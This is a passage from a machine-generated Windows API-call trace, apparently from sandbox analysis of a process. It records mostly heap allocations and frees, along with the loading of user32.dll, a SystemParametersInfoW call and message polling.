0x2a77bc0 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0256.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0256.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0256.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0256.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0256.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0256.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0256.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0256.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0256.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0256.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0256.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0256.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0256.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0256.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0256.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0256.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0256.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0256.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0256.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0256.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0256.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0256.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0256.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0256.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0256.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0256.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0256.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0256.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0256.126] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0256.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0256.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0256.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0256.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6fc0 [0256.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6fc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0256.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0256.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0256.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0256.127] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0256.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0256.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0256.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0256.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0256.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0256.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0256.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0256.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0256.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0256.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0256.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0256.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0256.127] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0256.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0256.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0256.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0256.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0256.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0256.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0256.256] FreeLibrary (hLibModule=0x76240000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0256.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0256.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38658e0 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0256.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866180 | out: hHeap=0x2af0000) returned 1 [0256.257] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0256.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0256.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0256.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0256.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0256.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0256.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0256.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0256.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38658e0 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0256.261] HeapFree (in: 